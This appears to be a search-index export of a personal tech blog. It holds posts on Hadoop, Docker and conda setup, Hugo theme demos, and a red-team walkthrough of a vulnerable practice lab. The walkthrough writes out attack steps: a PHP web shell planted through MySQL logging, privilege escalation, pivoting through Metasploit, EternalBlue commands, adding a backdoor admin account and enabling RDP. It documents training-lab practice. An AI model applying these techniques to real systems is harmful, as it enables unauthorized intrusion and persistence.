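hadoop02:/etc/\nscp /etc/profile hadoop03:/etc/\n2.6 Create the Hadoop data directories (run on all nodes)\nCreate the directories that match the paths configured in hdfs-site.xml:\nmkdir -p /usr/local/hadoop/tmp\nmkdir -p /usr/local/hadoop/dfs/name\nmkdir -p /usr/local/hadoop/dfs/data\n# Set the directory ownership (to avoid insufficient permissions)\nchown -R $USER:$USER /usr/local/hadoop/\nIII. Formatting HDFS and starting the cluster\n3.1 Format the NameNode (run on the master node only)\nNote: run this only once, at the first setup; running it again wipes the HDFS data!\nhdfs namenode -format\nOn success it prints successfully formatted and creates the initial data under /usr/local/hadoop/dfs/name.\n3.2 Start the Hadoop cluster (run on the master node)\nHadoop offers two ways to start: step by step (easier to troubleshoot) and all at once (efficient).\n(1) Step-by-step start (recommended for beginners)\n# Start HDFS (NameNode, DataNode)\nhdfs --daemon start namenode\nhdfs --daemon start datanode\n# Start YARN (ResourceManager, NodeManager)\nyarn --daemon start resourcemanager\nyarn --daemon start nodemanager\n(2) One-step start (available once workers is configured)\n# Start all HDFS and YARN processes\nstart-dfs.sh\nstart-yarn.sh\n# Or start all processes directly (including HistoryServer)\nstart-all.sh\n3.3 Verify the cluster state\n(1) Check the processes (run on the master node)\njps\nThe master node should show the following processes:\nNameNode\nResourceManager\nSecondaryNameNode (HDFS auxiliary node)\nJps\nThe worker nodes (hadoop02, hadoop03) should show:\nDataNode\nNodeManager\nJps\n(2) Web UI verification\nHadoop provides web interfaces for viewing the cluster state; make sure the browser can reach the node IPs:\nHDFS status: open http://hadoop01:9870 (the port is 9870 in Hadoop 3.x and 50070 in 2.x); the \u0026#34;Datanodes\u0026#34; page should show 2 worker nodes online.\nYARN status: open http://hadoop01:8088; the \u0026#34;Nodes\u0026#34; page should show 2 NodeManager nodes.\n(3) Verify by running HDFS commands\n# Create a test directory\nhdfs dfs -mkdir /test\n# Upload a local file to HDFS\necho \u0026#34;hello hadoop\u0026#34; \u0026gt; test.txt\nhdfs dfs -put test.txt /test/\n# View the files in HDFS\nhdfs dfs -ls /test/\nhdfs dfs -cat /test/test.txt\nIf the commands above run normally, HDFS is working.\nIV. Common problems and pitfalls\nDataNode fails to start?\nCause: formatting the NameNode more than once leaves the DataNode clusterID out of step with the NameNode.\nFix: delete the /usr/local/hadoop/dfs/data directory on all nodes and format the NameNode again (once only).\nWeb UI not reachable?\nCause: the firewall is not turned off, the IP mapping is misconfigured, or the port is in use.\nFix: run the firewall shutdown commands again, check the /etc/hosts configuration, and use netstat -tunlp | grep 9870 to see whether the port is in use.\nNodeManager not online after YARN starts?\nCause: yarn-site.xml is misconfigured or there is not enough memory.\nFix: check that yarn.resourcemanager.hostname is hadoop01, and add yarn.nodemanager.vmem-check-enabled=false to turn off the memory check.\nV. Summary\nThis article has explained in detail how to build a 3-node Hadoop 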
cluster; the core steps can be summarised as: environment preparation → passwordless SSH → Hadoop configuration → syncing the nodes → formatting and starting → verifying the state. For beginners, paying attention to the IP mapping, passwordless SSH, configuration file paths and permissions avoids most problems.\nFrom here you can go on to study Hadoop distributed computing (MapReduce), YARN resource scheduling and similar features, or set up ecosystem components such as HBase and Spark, and move step by step deeper into big data technology.\n(Note: part of this document was generated by AI)\n","date":"2025-09-10T00:00:00Z","image":"https://Izumiy0.github.io/p/%E8%B6%85%E8%AF%A6%E7%BB%86-hadoop-%E9%9B%86%E7%BE%A4%E6%90%AD%E5%BB%BA%E6%8C%87%E5%8D%97%E4%BB%8E%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87%E5%88%B0%E6%88%90%E5%8A%9F%E5%90%AF%E5%8A%A8/IIustraclones-Moebius_hu_ace7716a645bd973.jpg","permalink":"https://Izumiy0.github.io/p/%E8%B6%85%E8%AF%A6%E7%BB%86-hadoop-%E9%9B%86%E7%BE%A4%E6%90%AD%E5%BB%BA%E6%8C%87%E5%8D%97%E4%BB%8E%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87%E5%88%B0%E6%88%90%E5%8A%9F%E5%90%AF%E5%8A%A8/","title":"A very detailed guide to building a Hadoop cluster: from environment preparation to a successful start"},{"content":"Installing Docker on Ubuntu-service-2024\nOfficial Ubuntu download\nCheck for and remove old versions\nsudo apt-get remove docker docker-engine docker.io containerd runc\nInstall the new version\n# Start with the usual package index update\nsudo apt update\n# Install the Docker dependencies\n# Docker depends on a few packages on Ubuntu. Run the following command to install them\nsudo apt-get install ca-certificates curl gnupg lsb-release\n# Add the official Docker GPG key (fetched over HTTPS)\ncurl -fsSL https://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -\n# Add the Docker package repository\nsudo add-apt-repository \u0026#34;deb [arch=amd64] https://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable\u0026#34;\n# Install the Docker engine\nsudo apt update\nsudo apt install docker-ce docker-ce-cli containerd.io docker-compose-plugin\n# Configure the user group (optional, recommended)\n# By default only root and members of the docker group can run Docker commands. Adding the current user to the docker group avoids having to use sudo every time.\n# Add the current user to the docker group\nsudo usermod -aG docker $USER\n# Log out of the current session and log in again, or use the following command to apply it immediately\nnewgrp docker\n# Start Docker and enable it at boot\nsudo systemctl start docker\nsudo systemctl status docker\nsudo systemctl enable docker\nInstalling docker-compose with pip\n# Upgrade pip\npip3 install --upgrade pip -i https://pypi.tuna.tsinghua.edu.cn/simple\n# Install docker-compose:\npip3 install docker-compose -i https://pypi.tuna.tsinghua.edu.cn/simple\n# Check the installation\n
docker-compose version","date":"2025-09-02T00:00:00Z","image":"https://Izumiy0.github.io/p/ubuntu-service-2024%E5%AE%89%E8%A3%85docker%E5%92%8Cdocker-compose/docker_hu_f306f7556d0df008.jpg","permalink":"https://Izumiy0.github.io/p/ubuntu-service-2024%E5%AE%89%E8%A3%85docker%E5%92%8Cdocker-compose/","title":"Installing Docker and docker-compose on Ubuntu-service-2024"},{"content":"Installing miniconda\n# Download\nwget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh\n# Make it executable\nchmod +x Miniconda3-latest-Linux-x86_64.sh\n# Run\n./Miniconda3-latest-Linux-x86_64.sh\n# Answering yes to conda init is recommended\n# Then exit the terminal and reconnect to load the environment variables, or run source ~/.bashrc\n# Note that this step must be done in bash, not in fish or similar shells\nManaging Python virtual environments with conda\nChanging the conda channels\n# Change the conda channels\n# Add the Tsinghua mirror\nconda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/\nconda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/\nconda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/r/\nconda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/msys2/\nconda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/cloud/conda-forge/\n# Show the channel URLs\nconda config --set show_channel_urls yes\n# Remove the default channel (optional)\nconda config --remove channels defaults\nManaging virtual environments\n# Create an environment named MyEnvName with Python 3.11\nconda create -n MyEnvName python=3.11\n# Delete the virtual environment\nconda remove -n MyEnvName --all\nChanging the pip index inside a virtual environment\n# Activate the virtual environment\nconda activate MyEnvName # Activate it in bash; once activated you can start fish or similar and it stays activated\n# Change the pip index\npip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple\npip config set global.trusted-host pypi.tuna.tsinghua.edu.cn 
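","date":"2025-09-02T00:00:00Z","image":"https://Izumiy0.github.io/p/ubuntu-service-2024%E5%AE%89%E8%A3%85miniconda%E7%AE%A1%E7%90%86python%E7%8E%AF%E5%A2%83/conda_hu_f1a1128eada253f3.jpg","permalink":"https://Izumiy0.github.io/p/ubuntu-service-2024%E5%AE%89%E8%A3%85miniconda%E7%AE%A1%E7%90%86python%E7%8E%AF%E5%A2%83/","title":"Installing miniconda on Ubuntu-service-2024 to manage Python environments"},{"content":"ATT\u0026amp;CK red team assessment (Red Sun lab 1)\nLab download: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/\n0X01 - Host discovery\nsudo arp-scan -l\nWeb server IP: 192.168.20.100\nKali attack machine IP: 192.168.20.118\n0X02 - Information gathering\nsudo nmap -sV -p- 192.168.20.100\nPort scan results\n0X03 - Web penetration\nOpening the web interface\nThe page is directly a PHP probe page. I tried the database connection and root:root connects; in the function list, the eval function is shown as not supported.\nDirectory scan\ngobuster dir -u http://192.168.20.100/ -w /usr/share/wordlists/dirbuster/commen.txt -x php,zip,txt,html\nFound phpmyadmin; logging in with root:root succeeded.\nFound yxcms, but the password found in the database could not log in to the admin back end, and inserting one did not work either (if any expert knows how to do this step, please advise).\nWriting a web shell with SQL statements\n# Check write permission; if secure_file_priv is null there is none\nSHOW GLOBAL VARIABLES LIKE \u0026#39;%secure%\u0026#39;;\n# Check whether logging is enabled; this returns whether it is on and the log file path\nSHOW GLOBAL VARIABLES LIKE \u0026#39;%general%\u0026#39;;\n# Enable logging\nSET GLOBAL general_log = ON;\n# Set the log file, so that PHP code included in an SQL statement is recorded into test.php, which writes the shell\nSET GLOBAL general_log_file = \u0026#39;C:/phpstudy/WWW/test.php\u0026#39;;\n# Write the web shell\nselect \u0026#39;\u0026lt;?php eval($_POST[\u0026#34;hack\u0026#34;]);?\u0026gt;\u0026#39;;\n# After this statement runs, the log records the query text after select, which turns the log file into a one-line web shell\n# Here the eval function connects normally; I do not know what happened with the probe test result above\n0X04 - Post-exploitation\nGetting a Cobalt Strike session\nGenerated an exe with CS, connected to the shell with AntSword, then uploaded and ran it.\nOnce the session came in it had administrator privileges. I tried to escalate to system: systeminfo showed Windows 7 with very few patches, and escalating to system with ms14_058 succeeded.\n# Try to enable the 3389 service\nreg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\u0026#34; /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\u0026#34; /v PortNumber /t REG_DWORD /d 3389 /f\nreg add 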
\u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\u0026#34; /v PortNumber /t REG_DWORD /d 3389 /f\nnet start termservice\n0X05 - Internal network\nProbing\nUse the CS built-in: right-click -\u0026gt; browse and probe -\u0026gt; network probe \u0026amp; port scan (3 live hosts are visible, one of which is already online; all have port 445 open, so ms17-010 has to be tried)\nLinking with msf for easy access to the internal network\nStart a listener in msf\nIn CS, create a foreign listener with the same IP and port that msf just used, then select the target machine: right-click -\u0026gt; credentials and privilege escalation (spawn) -\u0026gt; new session -\u0026gt; choose the listener just created -\u0026gt; run\nmsf gets the session\nSo that tools other than msf can also enter the internal network through the session bounced back from CS, msf needs to set up a socks reverse proxy.\nFirst create a route: run post/multi/manage/autoroute\nView the routes: run autoroute -p\nBackground the session and set up socks\nbackground\nuse auxiliary/server/socks_proxy\nset VERSION 4a\nset SRVHOST 127.0.0.1\nshow options\n# Check the proxy port here; later edit /etc/proxychains4.conf to the corresponding IP:PORT\nexploit\nEdit proxychains4.conf\nsudo vim /etc/proxychains4.conf # change the file contents to the IP:PORT set in msf\n0X06 - Breaking through the internal network with ms17-010\nnet view\narp\n# Probe for live hosts on the internal network\nuse post/windows/gather/arp_scanner\nset RHOSTS 192.168.52.0/24\nset SESSION 1\nexploit\n# View domain information:\nnet view\n# View primary domain information:\nnet view /domain\n# Start lateral movement to take control of other hosts\n# Probe the ports of other internal hosts\nsudo proxychains nmap -sS -sV -Pn 192.168.52.138\n# Port 445 found; try EternalBlue\nsearch ms17-010\nuse auxiliary/admin/smb/ms17_010_command\nset COMMAND net user\nset RHOST 192.168.52.141\nexploit\n# Add a user\nnet user hack qaz@123 /add\n# Add the new user to the administrators group\nnet localgroup administrators hack /add\n# Try to enable the 3389 service\nreg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\u0026#34; /v fDenyTSConnections /t REG_DWORD /d 0 /f\nreg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\u0026#34; /v PortNumber /t REG_DWORD /d 3389 /f\nreg add \u0026#34;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\u0026#34; /v PortNumber /t REG_DWORD /d 3389 /f\nnet start termservice 
","date":"2024-09-02T00:00:00Z","image":"https://Izumiy0.github.io/p/attck-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA01/background_hu_c86aee492af4edec.jpg","permalink":"https://Izumiy0.github.io/p/attck-%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA01/","title":"ATT\u0026CK (红日靶场01)"},{"content":"JAVA导出SSL证书 1 2 3 4 5 #首先有一个keystore文件,为私钥 keytool -list -keystore keystore #查看keystore密钥里面所有的证书 #导出证书为 kiss.p12 ,-srcalias tomcat为keystore存的密码,执行下面命令后会输入新的自定义的密码 keytool -importkeystore -srckeystore keystore -destkeystore kiss.p12 -deststoretype pkcs12 -srcalias tomcat SSL证书导入wireshark 1 2 # 1.在Wireshark中，进入菜单 Edit -\u0026gt; Preferences…。 # 2.展开 Protocols -\u0026gt; SSL，点击 Edit 按钮编辑 RSA key lists。 ","date":"2024-08-10T00:00:00Z","image":"https://Izumiy0.github.io/p/java%E5%AF%BC%E5%87%BAssl%E8%AF%81%E4%B9%A6%E8%A7%A3%E5%AF%86https%E6%B5%81%E9%87%8F/wireshark_hu_9f49d044a5517acf.png","permalink":"https://Izumiy0.github.io/p/java%E5%AF%BC%E5%87%BAssl%E8%AF%81%E4%B9%A6%E8%A7%A3%E5%AF%86https%E6%B5%81%E9%87%8F/","title":"JAVA导出SSL证书解密https流量"},{"content":"正文测试 而这些并不是完全重要，更加重要的问题是， 带着这些问题，我们来审视一下学生会退会。 既然如何， 对我个人而言，学生会退会不仅仅是一个重大的事件，还可能会改变我的人生。 我们不得不面对一个非常尴尬的事实，那就是， 可是，即使是这样，学生会退会的出现仍然代表了一定的意义。 学生会退会，发生了会如何，不发生又会如何。 经过上述讨论， 生活中，若学生会退会出现了，我们就不得不考虑它出现了的事实。 学生会退会，到底应该如何实现。 这样看来， 在这种困难的抉择下，本人思来想去，寝食难安。 对我个人而言，学生会退会不仅仅是一个重大的事件，还可能会改变我的人生。 就我个人来说，学生会退会对我的意义，不能不说非常重大。 莎士比亚曾经提到过，人的一生是短的，但如果卑劣地过这一生，就太长了。这似乎解答了我的疑惑。 莫扎特说过一句富有哲理的话，谁和我一样用功，谁就会和我一样成功。这启发了我， 对我个人而言，学生会退会不仅仅是一个重大的事件，还可能会改变我的人生。 学生会退会，到底应该如何实现。 一般来说， 从这个角度来看， 这种事实对本人来说意义重大，相信对这个世界也是有一定意义的。 在这种困难的抉择下，本人思来想去，寝食难安。 了解清楚学生会退会到底是一种怎么样的存在，是解决一切问题的关键。 一般来说， 生活中，若学生会退会出现了，我们就不得不考虑它出现了的事实。 问题的关键究竟为何？ 而这些并不是完全重要，更加重要的问题是。\n奥斯特洛夫斯基曾经说过，共同的事业，共同的斗争，可以使人们产生忍受一切的力量。　带着这句话，我们还要更加慎重的审视这个问题： 一般来讲，我们都必须务必慎重的考虑考虑。 既然如此， 这种事实对本人来说意义重大，相信对这个世界也是有一定意义的。 带着这些问题，我们来审视一下学生会退会。 我认为， 我认为， 在这种困难的抉择下，本人思来想去，寝食难安。 问题的关键究竟为何？ 每个人都不得不面对这些问题。 在面对这种问题时， 要想清楚，学生会退会，到底是一种怎么样的存在。 我认为， 既然如此， 每个人都不得不面对这些问题。 在面对这种问题时， 那么， 我认为， 学生会退会因何而发生。\n引用 思念是最暖的忧伤像一双翅膀\n让我停不了飞不远在过往游荡\n不告而别的你 
even if it was for my own good\nwith care this painful, how can I soar\n最暖的憂傷 - 田馥甄\nImages\n![Photo by Florian Klauer on Unsplash](florian-klauer-nptLmg6jqDo-unsplash.jpg) ![Photo by Luca Bravo on Unsplash](luca-bravo-alS7ewQ41M8-unsplash.jpg)\n![Photo by Helena Hertz on Unsplash](helena-hertz-wWZzXlDpMog-unsplash.jpg) ![Photo by Hudai Gayiran on Unsplash](hudai-gayiran-3Od_VKcDEAA-unsplash.jpg)\nThe gallery syntax comes from Typlog\n","date":"2020-09-09T00:00:00Z","image":"https://Izumiy0.github.io/p/test-chinese/helena-hertz-wWZzXlDpMog-unsplash_hu_2307260c751d0e0b.jpg","permalink":"https://Izumiy0.github.io/p/test-chinese/","title":"Chinese Test"},{"content":"This article offers a sample of basic Markdown syntax that can be used in Hugo content files; it also shows whether basic HTML elements are decorated with CSS in a Hugo theme.\nHeadings The following HTML \u0026lt;h1\u0026gt;—\u0026lt;h6\u0026gt; elements represent six levels of section headings. \u0026lt;h1\u0026gt; is the highest section level while \u0026lt;h6\u0026gt; is the lowest.\nH1 H2 H3 H4 H5 H6 Paragraph Xerum, quo qui aut unt expliquam qui dolut labo. Aque venitatiusda cum, voluptionse latur sitiae dolessi aut parist aut dollo enim qui voluptate ma dolestendit peritin re plis aut quas inctum laceat est volestemque commosa as cus endigna tectur, offic to cor sequas etum rerum idem sintibus eiur? Quianimin porecus evelectur, cum que nis nust voloribus ratem aut omnimi, sitatur? Quiatem. Nam, omnis sum am facea corem alique molestrunt et eos evelece arcillit ut aut eos eos nus, sin conecerem erum fuga. Ri oditatquam, ad quibus unda veliamenimin cusam et facea ipsamus es exerum sitate dolores editium rerore eost, temped molorro ratiae volorro te reribus dolorer sperchicium faceata tiustia prat.\nItatur? 
Quiatae cullecum rem ent aut odis in re eossequodi nonsequ idebis ne sapicia is sinveli squiatum, core et que aut hariosam ex eat.\nBlockquotes The blockquote element represents content that is quoted from another source, optionally with a citation which must be within a footer or cite element, and optionally with in-line changes such as annotations and abbreviations.\nBlockquote without attribution Tiam, ad mint andaepu dandae nostion secatur sequo quae. Note that you can use Markdown syntax within a blockquote.\nBlockquote with attribution Don\u0026rsquo;t communicate by sharing memory, share memory by communicating.\n— Rob Pike1\nTables Tables aren\u0026rsquo;t part of the core Markdown spec, but Hugo supports them out-of-the-box.\nName | Age\nBob | 27\nAlice | 23\nInline Markdown within tables\nItalics | Bold | Code\nitalics | bold | code\nA B C D E F Lorem ipsum dolor sit amet, consectetur adipiscing elit. Phasellus ultricies, sapien non euismod aliquam, dui ligula tincidunt odio, at accumsan nulla sapien eget ex. Proin eleifend dictum ipsum, non euismod ipsum pulvinar et. Vivamus sollicitudin, quam in pulvinar aliquam, metus elit pretium purus Proin sit amet velit nec enim imperdiet vehicula. Ut bibendum vestibulum quam, eu egestas turpis gravida nec Sed scelerisque nec turpis vel viverra. 
Vivamus vitae pretium sapien Code Blocks Code block with backticks \u0026lt;!doctype html\u0026gt; \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;Example HTML5 Document\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;p\u0026gt;Test\u0026lt;/p\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Code block indented with four spaces \u0026lt;!doctype html\u0026gt; \u0026lt;html lang=\u0026quot;en\u0026quot;\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026quot;utf-8\u0026quot;\u0026gt; \u0026lt;title\u0026gt;Example HTML5 Document\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;p\u0026gt;Test\u0026lt;/p\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Code block with Hugo\u0026rsquo;s internal highlight shortcode \u0026lt;!doctype html\u0026gt; \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;Example HTML5 Document\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;p\u0026gt;Test\u0026lt;/p\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Diff code block [dependencies.bevy] git = \u0026#34;https://github.com/bevyengine/bevy\u0026#34; rev = \u0026#34;11f52b8c72fc3a568e8bb4a4cd1f3eb025ac2e13\u0026#34; - features = [\u0026#34;dynamic\u0026#34;] + features = [\u0026#34;jpeg\u0026#34;, \u0026#34;dynamic\u0026#34;] List Types Ordered List First item Second item Third item Unordered List List item Another item And another item Nested list Fruit Apple Orange Banana Dairy Milk Cheese Other Elements — abbr, sub, sup, kbd, mark GIF is a bitmap image format.\nH2O\nXn + Yn = Zn\nPress CTRL + ALT + Delete to end the session.\nMost salamanders are nocturnal, and hunt for insects, worms, and other 
small creatures.\nHyperlinked image The above quote is excerpted from Rob Pike\u0026rsquo;s talk during Gopherfest, November 18, 2015.\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","date":"2019-03-11T00:00:00Z","image":"https://Izumiy0.github.io/p/markdown-syntax-guide/pawel-czerwinski-8uZPynIu-rQ-unsplash_hu_e95a4276bf860a84.jpg","permalink":"https://Izumiy0.github.io/p/markdown-syntax-guide/","title":"Markdown Syntax Guide"},{"content":"Lorem est tota propiore conpellat pectoribus de pectora summo.\nRedit teque digerit hominumque toris verebor lumina non cervice subde tollit usus habet Arctonque, furores quas nec ferunt. Quoque montibus nunc caluere tempus inhospita parcite confusaque translucet patri vestro qui optatis lumine cognoscere flos nubis! Fronde ipsamque patulos Dryopen deorum.\nExierant elisi ambit vivere dedere Duce pollice Eris modo Spargitque ferrea quos palude Rursus nulli murmur; hastile inridet ut ab gravi sententia! Nomine potitus silentia flumen, sustinet placuit petis in dilapsa erat sunt. Atria tractus malis.\nComas hunc haec pietate fetum procerum dixit Post torum vates letum Tiresia Flumen querellas Arcanaque montibus omnes Quidem et Vagus elidunt The Van de Graaf Canon\nMane refeci capiebant unda mulcebat Victa caducifer, malo vulnere contra dicere aurato, ludit regale, voca! Retorsit colit est profanae esse virescere furit nec; iaculi matertera et visa est, viribus. Divesque creatis, tecta novat collumque vulnus est, parvas. Faces illo pepulere tempus adest. Tendit flamma, ab opes virum sustinet, sidus sequendo urbis.\nIubar proles corpore raptos vero auctor imperium; sed et huic: manus caeli Lelegas tu lux. Verbis obstitit intus oblectamina fixis linguisque ausus sperare Echionides cornuaque tenent clausit possit. Omnia putatur. Praeteritae refert ausus; ferebant e primus lora nutat, vici quae mea ipse. 
Et iter nil spectatae vulnus haerentia iuste et exercebat, sui et.\nEurytus Hector, materna ipsumque ut Politen, nec, nate, ignari, vernum cohaesit sequitur. Vel mitis temploque vocatus, inque alis, oculos nomen non silvis corpore coniunx ne displicet illa. Crescunt non unus, vidit visa quantum inmiti flumina mortis facto sic: undique a alios vincula sunt iactata abdita! Suspenderat ego fuit tendit: luna, ante urbem Propoetides parte.\n","date":"2019-03-09T00:00:00Z","image":"https://Izumiy0.github.io/p/placeholder-text/matt-le-SJSpo9hQf7s-unsplash_hu_c1ca39d792aee4ab.jpg","permalink":"https://Izumiy0.github.io/p/placeholder-text/","title":"Placeholder Text"},{"content":"Mathematical notation in a Hugo project can be enabled by using third party JavaScript libraries.\nIn this example we will be using KaTeX\nCreate a partial under /layouts/partials/math.html Within this partial reference the Auto-render Extension or host these scripts locally. Include the partial in your templates like so: {{ if or .Params.math .Site.Params.math }} {{ partial \u0026#34;math.html\u0026#34; . 
}} {{ end }} To enable KaTeX globally set the parameter math to true in a project\u0026rsquo;s configuration To enable KaTeX on a per page basis include the parameter math: true in content files Note: Use the online reference of Supported TeX Functions\nExamples Inline math: $\\varphi = \\dfrac{1+\\sqrt5}{2}= 1.6180339887…$\nBlock math: $$ \\varphi = 1+\\frac{1} {1+\\frac{1} {1+\\frac{1} {1+\\cdots} } } $$","date":"2019-03-08T00:00:00Z","permalink":"https://Izumiy0.github.io/p/math-typesetting/","title":"Math Typesetting"},{"content":"Emoji can be enabled in a Hugo project in a number of ways.\nThe emojify function can be called directly in templates or Inline Shortcodes.\nTo enable emoji globally, set enableEmoji to true in your site\u0026rsquo;s configuration and then you can type emoji shorthand codes directly in content files; e.g.\n🙈 :see_no_evil: 🙉 :hear_no_evil: 🙊 :speak_no_evil:\nThe Emoji cheat sheet is a useful reference for emoji shorthand codes.\nN.B. The above steps enable Unicode Standard emoji characters and sequences in Hugo, however the rendering of these glyphs depends on the browser and the platform. To style the emoji you can either use a third party emoji font or a font stack; e.g.\n.emoji { font-family: Apple Color Emoji, Segoe UI Emoji, NotoColorEmoji, Segoe UI Symbol, Android Emoji, EmojiSymbols; } ","date":"2019-03-05T00:00:00Z","image":"https://Izumiy0.github.io/p/emoji-support/the-creative-exchange-d2zvqp3fpro-unsplash_hu_27b8954607cdb515.jpg","permalink":"https://Izumiy0.github.io/p/emoji-support/","title":"Emoji Support"},{"content":"Problems encountered and their solutions\nNo IP address after reboot\n# Configure a static IP\n# Use dhclient\n# Install\nsudo apt install isc-dhcp-client\n# Run\nsudo dhclient ","date":"0001-01-01T00:00:00Z","permalink":"https://Izumiy0.github.io/p/","title":""}]